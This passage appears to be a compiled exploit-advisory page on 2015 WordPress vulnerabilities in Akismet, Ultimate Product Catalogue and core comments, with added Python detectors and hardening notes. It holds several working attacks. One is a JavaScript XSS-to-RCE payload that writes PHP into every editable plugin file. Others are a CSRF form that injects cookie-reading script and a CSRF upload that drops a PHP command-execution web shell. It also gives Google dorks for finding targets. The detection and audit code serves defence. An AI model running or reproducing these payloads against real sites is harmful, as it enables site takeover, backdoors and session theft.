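# Constructed sample: vulnerable shape (no nonce, no capability check, raw output).
VULNERABLE_PHP = r"""
function embedarticles_save_settings() {
    if (isset($_POST['embedarticles_hidden']) && $_POST['embedarticles_hidden'] == 'Y') {
        update_option('embedarticles_pub_value', $_POST['pub_value']);
        update_option('embedarticles_display', $_POST['display']);
    }
    echo '<input type="text" name="pub_value" value="' . get_option('embedarticles_pub_value') . '" />';
}
"""

# Constructed sample: hardened shape (nonce verified, capability checked,
# input sanitised on the way in, output escaped on the way out).
HARDENED_PHP = r"""
function embedarticles_save_settings() {
    if (isset($_POST['embedarticles_hidden'])) {
        check_admin_referer('embedarticles_save', 'embedarticles_nonce');
        if (!current_user_can('manage_options')) {
            wp_die('Insufficient privileges');
        }
        update_option('embedarticles_pub_value', sanitize_text_field($_POST['pub_value']));
    }
    wp_nonce_field('embedarticles_save', 'embedarticles_nonce');
    echo '<input type="text" name="pub_value" value="' . esc_attr(get_option('embedarticles_pub_value')) . '" />';
}
"""

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_PHP), ("hardened", HARDENED_PHP)):
        print(label, audit_handlers(src) or "clean")
```

The checker is a triage aid, not a proof: a handler it flags still has to be confirmed by hand (the sink must actually be reachable with the forged values), and a handler it passes may verify the nonce on a code path the forged request never takes. The hardened snippet also shows the second half of the fix the advisory implies, escaping the stored value with esc_attr() when it is echoed back into the settings page, which is what stops the stored XSS even if a write does get through.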
 
 
Mitigation 
==========
Plugin Closed
 
Change Log
==========
Plugin Closed
 
Disclosure 
==========
07-April-2015 Reported to Developer
Plugin Closed

Credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh (at) me (dot) com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

9 May 2015

WordPress Akismet 3.1.1 Cross Site Scripting

# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ , https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php

 User input reaches a sensitive sink when the function add_comment_author_url() is called (class.akismet-admin.php):

428: print print (wp_update_comment($comment));
426: $comment['comment_author_url'] = esc_url($_POST['url']);

Reaching that sink requires:
423: if(!empty($_POST['id']) && !empty($_POST['url']) && check_admin_referer('comment_author_url_nonce'))
425: if($comment && current_user_can('edit_comment', $comment['comment_ID']))
422: function add_comment_author_url()

Practical caveat: as the preconditions above show, the request must carry a valid comment_author_url_nonce and come from a user who already holds the edit_comment capability for the target comment, and the value passes through esc_url() before it is stored. The audience that can reach this sink is therefore limited to authenticated users with comment-editing rights.
 
 
Special thanks: Milad Hacking, MMA Defacer, Ramin Ramz, Alireza Attacker, Xodiak, Adel Netcat, Mr.Tekide, Ang3l--Demon

9 May 2015

WordPress 4.2.1 XSS / Code Execution

/*
Author: @Evex_1337
Title: WordPress XSS to RCE
Description: This exploit uses XSS vulnerabilities in WordPress plugins, themes or
core to end up executing code once it is triggered in the browser of an
administrator-privileged user. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.

*/
// Resolve the installed-plugins page relative to wherever the payload is running
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php';
// Inject a hidden "xss" div used as a scratch container for fetched admin pages
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
// Fetch the installed-plugins page with the admin's session and load it into the div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout: 30000,
  success: function (txt) {
    xss_div.html(txt);
  }
});
// Collect every plugin-editor link ("?file=...") from the plugins page
plugins_edit = [];
xss_div.find('a').each(function () {
  if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
    plugins_edit.push(jQuery(this).attr('href'));
  }
});
// For each editable plugin file: load the editor form, take its _wpnonce and current
// contents, prepend the PHP payload and submit the edit form with the admin's session
for (var i = 0; i < plugins_edit.length; i++) {
  jQuery.ajax({
    url: plugins_edit[i],
    type: 'GET',
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
      xss_div.html(txt);
      _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"') [1];
      old_code = jQuery('form#template div textarea#newcontent') [0].value;
      payload = '<?php phpinfo(); ?>';
      new_code = payload + '\n' + old_code;
      file = plugins_edit[i].split('file=') [1];
      jQuery.ajax({
        url: plugins_edit[i],
        type: 'POST',
        data: {
          '_wpnonce': _wpnonce,
          'newcontent': new_code,
          'action': 'update',
          'file': file,
          'submit': 'Update File'
        },
        async: false,
        cache: false,
        timeout: 30000,
        success: function (txt) {
          xss_div.html(txt);
          // If the editor now shows the payload the write succeeded: the backdoored
          // file is reachable at injected_file, and the throw stops the loop
          if (jQuery('form#template div textarea#newcontent') [0].value.indexOf(payload) != - 1) {
            // Passed, this is up to you ( skiddies Filter :D )
            injected_file = window.location.href.split('wp-admin') [0] + '/wp-content/plugins/' + file; // e.g. http://localhost/wp//wp-content/plugins/504-redirects/redirects.php
            throw new Error('');
          }
        }
      });
    }
  });
}
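The payload above leaves a characteristic trace in the web server log: from the victim administrator's browser it fetches plugins.php, then each scraped "?file=" editor link, then issues a POST back to the editor with action=update, all within a second or two. The following Python is an added example, not part of the exploit or of WordPress, that runs that detection over a few constructed Apache combined-format lines. The path /wp-admin/plugin-editor.php is WordPress core's plugin editor, the page those "?file=" links lead to; the hostnames, addresses and timestamps in the sample lines are invented.

```python
"""Detect the plugin-editor write chain produced by the payload above.

Added example, not part of the exploit or of WordPress. The log lines are
constructed in Apache combined format to mimic what the payload leaves behind
when it runs in an administrator's browser: a GET of plugins.php, GETs of the
scraped "?file=" editor links, then a POST back to the editor, within seconds.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# WordPress core's plugin editor; the "?file=" links the payload scrapes point here.
EDITOR = "/wp-admin/plugin-editor.php"


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d


def detect_editor_chain(lines, window=timedelta(seconds=30)):
    """One finding per POST to the plugin editor. automated_chain is True when the
    same client fetched plugins.php and read an editor page inside `window`
    beforehand, which is the payload's signature rather than a hand edit."""
    events = [e for e in map(parse, lines) if e]
    findings = []
    for e in events:
        if e["method"] != "POST" or not e["path"].startswith(EDITOR):
            continue
        earlier = [x for x in events if x["ip"] == e["ip"] and x["method"] == "GET"
                   and e["ts"] - window <= x["ts"] <= e["ts"]]
        scraped_list = any(x["path"].startswith("/wp-admin/plugins.php") for x in earlier)
        read_editor = any(x["path"].startswith(EDITOR) and "file=" in x["path"] for x in earlier)
        findings.append({
            "ip": e["ip"],
            "time": e["ts"].isoformat(),
            "file": parse_qs(urlsplit(e["path"]).query).get("file", [""])[0],
            "automated_chain": scraped_list and read_editor,
        })
    return findings


SAMPLE_LOG = [
    # Constructed: the payload firing from the victim admin's browser at 10.0.0.5
    '10.0.0.5 - - [10/May/2015:14:02:11 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 200 51234 "http://wp.example/wp-admin/" "Mozilla/5.0"',
    '10.0.0.5 - - [10/May/2015:14:02:11 +0000] "GET /wp-admin/plugin-editor.php?file=504-redirects/redirects.php HTTP/1.1" 200 40211 "http://wp.example/wp-admin/" "Mozilla/5.0"',
    '10.0.0.5 - - [10/May/2015:14:02:12 +0000] "POST /wp-admin/plugin-editor.php?file=504-redirects/redirects.php HTTP/1.1" 302 0 "http://wp.example/wp-admin/" "Mozilla/5.0"',
    # Constructed: an administrator editing a file by hand, editor opened minutes earlier
    '10.0.0.9 - - [10/May/2015:13:50:00 +0000] "GET /wp-admin/plugin-editor.php?file=hello.php HTTP/1.1" 200 39000 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/May/2015:14:05:40 +0000] "POST /wp-admin/plugin-editor.php?file=hello.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    # Constructed: unrelated traffic
    '203.0.113.7 - - [10/May/2015:14:03:00 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "curl/7.38"',
]

if __name__ == "__main__":
    for f in detect_editor_chain(SAMPLE_LOG):
        print(f)
```

Any POST to the plugin editor is rare enough on a production site to alert on by itself; the automated_chain flag only helps an analyst separate this payload's burst from a legitimate hand edit. Preventively, defining the DISALLOW_FILE_EDIT constant as true in wp-config.php removes the plugin and theme editors from WordPress entirely, so the final POST in the chain has no endpoint to write to, and with the editor disabled any request to plugin-editor.php is itself worth an alert.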

9 May 2015

WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, communicated to and fixed by the vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary:

Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has over 63,000 downloads and over 4,000 active installations.

The Product Name, Product Description and File Upload forms of the Ultimate Product Catalogue plugin lack proper CSRF protection and proper input filtering. This allows an attacker to alter a product presented to customers or to the WordPress administrators and to insert XSS into its product name and description. It also allows an attacker to upload a PHP script through CSRF, because the file type is not filtered on upload.
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com; they fixed two SQLi in 3.1.3 but not these vulnerabilities.
- 28/04/2015: Fixed in version 3.1.5 without notifying me.
 
3. Vulnerable code:
 
    In file html/ProductPage, multiple lines.

4. Proof of concept:
 
https://www.youtube.com/watch?v=roB_ken6U4o
 
 
 ----------------------------------------------------------------------------------------------
   ------------- CSRF & XSS in Product Description and Name -----------
 
 ----------------------------------------------------------------------------------------------
 
<iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>
<form method='POST'
    action='http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'
    target="csrf-frame"
    id="csrf-form">
        <input type='hidden' name='action' value='Edit_Product'>
        <input type='hidden' name='_wp_http_referer' value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>
        <input type='hidden' name='Item_Name' value="Product name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>
        <input type='hidden' name='Item_Slug' value='asdf'/>
        <input type='hidden' name='Item_ID' value='16'/>
        <input type='hidden' name='Item_Image' value='http://i.imgur.com/6cWKujq.gif'>
        <input type='hidden' name='Item_Price' value='666'>
        <input type='hidden' name='Item_Description' value="Product description says<script>alert('Product description says: '+document.cookie)</script>"/>
        <input type='hidden' name='Item_SEO_Description' value='seo desc'>
        <input type='hidden' name='Item_Link' value=''>
        <input type='hidden' name='Item_Display_Status' value='Show'>
        <input type='hidden' name='Category_ID' value=''>
        <input type='hidden' name='SubCategory_ID' value=''>
        <input style="display:none" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
 
 
 
 ----------------------------------------------------------------------------------------------
   -------- CSRF & File Upload in Product Description and Name ------
 
 ----------------------------------------------------------------------------------------------
 
<html>
    <body onload="submitRequest();">
        <script>
          function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product", true);
            // Caveat: a cross-origin XMLHttpRequest only carries the victim's
            // cookies when xhr.withCredentials is true, and the non-safelisted
            // headers below make the browser send a CORS preflight that
            // WordPress does not answer. An auto-submitting <form>, as in the
            // first PoC, sidesteps both.
            // Most of these headers only mimic a browser form post; Host and
            // Accept-Encoding are set by the browser itself, which ignores
            // attempts to override them. The Content-Type with the boundary
            // is the one that matters.
            xhr.setRequestHeader("Host", "<web>");
            xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
            xhr.setRequestHeader("Cache-Control", "max-age=0");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8,es;q=0.6");
            xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36");
            xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");
            xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");
            // Multipart body: the "spreadsheet" is really a PHP file, which the
            // plugin stores without checking its type.
            var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
              "Content-Disposition: form-data; name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +
              "Content-Type: application/octet-stream\r\n" +
              "\r\n" +
              "<?php\r\n" +
              "exec($_GET['c'],$output);\r\n" +
              "foreach ($output as $line) {\r\n" +
              "echo \"<br/>\".$line;\r\n" +
              "}\r\n" +
              "?>\r\n" +
              "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
              "Content-Disposition: form-data; name='submit'\r\n" +
              "\r\n" +
              "Add New Products\r\n" +
              "------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ;
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
          }
        </script>
        <form action="#">
          <input style="display:none;" type="submit" value="Up!"
onclick="submitRequest();" />
      </form>
  </body>
</html>
 
The file cooldog.php is now available at
http://<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php
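As an added detection example, not part of this advisory or of the plugin's code, the following Python runs the two indicators this advisory gives us over web-server access log lines: the spreadsheet upload POST to admin.php arriving with a foreign or missing Referer, which is what a CSRF-driven upload looks like from the server side, and any request for a PHP file inside the product-sheets directory, which is the dropped file being used. The endpoint parameters and the directory come from the advisory; the log lines, host names and client addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format as written by Apache/nginx. The sample lines further
# down are constructed for this example; the host names are placeholders.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Upload endpoint named in the advisory: admin.php with these two query values.
UPLOAD_PAGE = "UPCP-options"
UPLOAD_ACTION = "UPCP_AddProductSpreadsheet"
# Directory the plugin writes the "spreadsheet" to, also from the advisory.
SHEET_DIR = "/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Anything the PHP interpreter might execute out of that directory.
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml")


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_cross_site(referer, site_host):
    """True when the Referer is missing or belongs to another host.

    A CSRF-driven upload arrives with the attacker's page as Referer (or with
    none at all if a referrer policy stripped it), never with the dashboard."""
    if not referer or referer == "-":
        return True
    return urlsplit(referer).hostname != site_host


def find_indicators(lines, site_host):
    """Scan log lines and return (kind, client_ip, request_path) tuples."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["path"])
        qs = parse_qs(url.query)
        # Indicator 1: the spreadsheet upload POST from a foreign origin.
        if (rec["method"] == "POST"
                and url.path.endswith("/wp-admin/admin.php")
                and qs.get("page") == [UPLOAD_PAGE]
                and qs.get("Action") == [UPLOAD_ACTION]
                and is_cross_site(rec["referer"], site_host)):
            hits.append(("csrf_upload", rec["ip"], rec["path"]))
        # Indicator 2: a script requested from the sheet directory. Uploaded
        # sheets are data; a .php file there is a dropped shell being used,
        # whatever the response status was.
        if url.path.startswith(SHEET_DIR) and url.path.lower().endswith(SCRIPT_EXTS):
            hits.append(("webshell", rec["ip"], rec["path"]))
    return hits


# Constructed sample log: a legitimate upload from the dashboard, the same
# request launched from an attacker's page, the dropped file being run, and
# ordinary catalogue traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Apr/2015:10:01:12 +0200] "POST /wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product HTTP/1.1" 200 5120 "http://shop.example/wp-admin/admin.php?page=UPCP-options" "Mozilla/5.0"',
    '10.0.0.5 - - [22/Apr/2015:10:03:40 +0200] "POST /wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product HTTP/1.1" 200 5120 "http://evil.example/cooldog.html" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Apr/2015:10:04:02 +0200] "GET /wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php?c=id HTTP/1.1" 200 81 "-" "curl/7.38.0"',
    '198.51.100.9 - - [22/Apr/2015:10:04:30 +0200] "GET /?SingleProduct=16 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for kind, ip, path in find_indicators(SAMPLE_LOG, "shop.example"):
        print(kind, ip, path)
```

The Referer test is deliberately strict: a missing Referer is treated as suspicious, so some legitimate uploads from browsers with a restrictive referrer policy will be flagged and need tuning. On the plugin side the fix is the one WordPress already offers every admin form, a nonce verified with check_admin_referer() plus an extension allowlist (wp_check_filetype()) applied before the file is moved into product-sheets.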


9May/15

WordPress 4.2 Cross Site Scripting

*Overview*
Current versions of WordPress are vulnerable to a stored XSS. An
unauthenticated attacker can inject JavaScript in WordPress comments. The
script is triggered when the comment is viewed.
 
If triggered by a logged-in administrator, under default settings the
attacker can leverage the vulnerability to execute arbitrary code on the
server via the plugin and theme editors.
 
Alternatively the attacker could change the administrator’s password,
create new administrator accounts, or do whatever else the currently
logged-in administrator can do on the target system.
 
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes so the comment
has to be quite long.
 
The truncation results in malformed HTML generated on the page. The
attacker can supply any attributes in the allowed HTML tags, in the same
way as the previous stored XSS vulnerabilities affecting WordPress.
 
The vulnerability bears a similarity to the one reported by Cedric Van
Bockhaven in 2014 (patched this week, after 14 months). Instead of using an
invalid UTF-8 character to truncate the comment, this time an excessively
long comment text is used for the same effect.
 
In these two cases the injected JavaScript apparently can't be triggered in
the administrative Dashboard, so these exploits require getting around
comment moderation e.g. by posting one harmless comment first.

*Proof of Concept*
Enter the following as a comment:
 
<a title='x onmouseover=alert(unescape(/hello%20world/.source))
style=position:absolute;left:0;top:0;width:5000px;height:5000px
 AAAAAAAAAAAA [64 kb] ...'></a>
 
 
This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53
and 5.5.41.
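As an added example, written for this page and not taken from Klikki's advisory or from WordPress, the following Python models the path the Details section describes: an allowlist sanitizer accepts the comment because the attacker's attributes sit inside the quoted value of a permitted title attribute, a TEXT column with strict SQL mode off keeps only the first 65535 bytes (with STRICT_TRANS_TABLES the insert errors out instead), and a check on the stored text finds the attribute quote the truncation removed. The allowlist, the tag tokenizer and poc_comment() are illustrative stand-ins, not WordPress's KSES; how WordPress renders the broken tag on output is not modelled. The last function is the control a practitioner would add: refuse before insert anything the column cannot hold in full.

```python
import re

MYSQL_TEXT_MAX = 65535  # bytes a MySQL TEXT column holds (wp_comments.comment_content)

# Illustrative allowlist, a stand-in for KSES: tag -> attributes it may carry.
ALLOWED = {"a": {"href", "title"}, "b": set(), "em": set(), "strong": set(), "p": set()}

TAG_RE = re.compile(r"<([A-Za-z][A-Za-z0-9]*)")


def tokenize_tag(body):
    """Tokenize the text that follows '<tagname' up to the closing '>'.

    Returns (attrs, closed): attrs is a list of (name, value) and closed is False
    when the input ran out inside a quoted value or before any '>' was seen."""
    attrs, i, n = [], 0, len(body)
    while i < n:
        if body[i].isspace():
            i += 1
            continue
        if body[i] == ">":
            return attrs, True
        j = i
        while j < n and not body[j].isspace() and body[j] not in "=>":
            j += 1
        name = body[i:j].lower()
        i = j
        while i < n and body[i].isspace():
            i += 1
        if i < n and body[i] == "=":
            i += 1
            while i < n and body[i].isspace():
                i += 1
            if i < n and body[i] in "'\"":
                quote = body[i]
                end = body.find(quote, i + 1)
                if end == -1:                      # opened, never closed
                    attrs.append((name, body[i + 1:]))
                    return attrs, False
                attrs.append((name, body[i + 1:end]))
                i = end + 1
            else:                                  # unquoted value
                j = i
                while j < n and not body[j].isspace() and body[j] != ">":
                    j += 1
                attrs.append((name, body[i:j]))
                i = j
        else:
            attrs.append((name, None))
    return attrs, False


def tags_in(html):
    """Yield (tagname, attrs, closed) for every start tag in html.
    Deliberately simple: no comments, CDATA or '<' inside attribute values."""
    for m in TAG_RE.finditer(html):
        attrs, closed = tokenize_tag(html[m.end():])
        yield m.group(1).lower(), attrs, closed


def sanitizer_accepts(comment):
    """What input filtering sees: every tag allowed, every attribute allowed for
    its tag, every tag complete. The PoC passes because its payload sits inside
    the quoted value of the permitted title attribute."""
    for tag, attrs, closed in tags_in(comment):
        if tag not in ALLOWED or not closed:
            return False
        if any(name not in ALLOWED[tag] for name, _ in attrs):
            return False
    return True


def mysql_text_store(comment):
    """Model a TEXT column with strict SQL mode off: the value is cut to 65535
    bytes and the insert succeeds. (With STRICT_TRANS_TABLES the insert fails
    with 'Data too long' and this path does not exist.)"""
    return comment.encode("utf-8")[:MYSQL_TEXT_MAX].decode("utf-8", errors="ignore")


def stored_form_is_broken(stored):
    """True when some start tag in the stored text ends inside a quoted
    attribute: the closing quote the sanitizer relied on was cut off."""
    return any(not closed for _, _, closed in tags_in(stored))


def exploitable_after_storage(comment):
    """The whole path from the advisory: accepted on input, mangled by storage."""
    return sanitizer_accepts(comment) and stored_form_is_broken(mysql_text_store(comment))


def length_check_rejects(comment, limit=MYSQL_TEXT_MAX):
    """The control that closes the class: refuse anything the column cannot hold
    in full, so what was validated is exactly what gets stored."""
    return len(comment.encode("utf-8")) > limit


def poc_comment(padding=MYSQL_TEXT_MAX):
    """A comment shaped like the advisory's PoC (constructed here): the attacker's
    attributes live inside the quoted title value and the padding pushes the
    closing quote past the column limit."""
    head = ("<a title='x onmouseover=alert(unescape(/hello%20world/.source)) "
            "style=position:absolute;left:0;top:0;width:5000px;height:5000px ")
    return head + "A" * padding + "'></a>"


if __name__ == "__main__":
    c = poc_comment()
    print("sanitizer accepts:", sanitizer_accepts(c))
    print("broken after storage:", stored_form_is_broken(mysql_text_store(c)))
    print("length check rejects:", length_check_rejects(c))
```

The point the model makes is that validation and storage disagree: the sanitizer judged one string and the database kept a different one. Any fix that re-validates after storage or caps the length before insert restores the invariant; filtering harder on input does not.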
 
 
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive
options as possible). Do not approve any comments.
 
 
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
 
An up-to-date version of this document: http://klikki.fi/adv/wordpress2.html
 
-- 
Jouko Pynnönen <jouko@iki.fi>
Klikki Oy - http://klikki.fi - @klikkioy
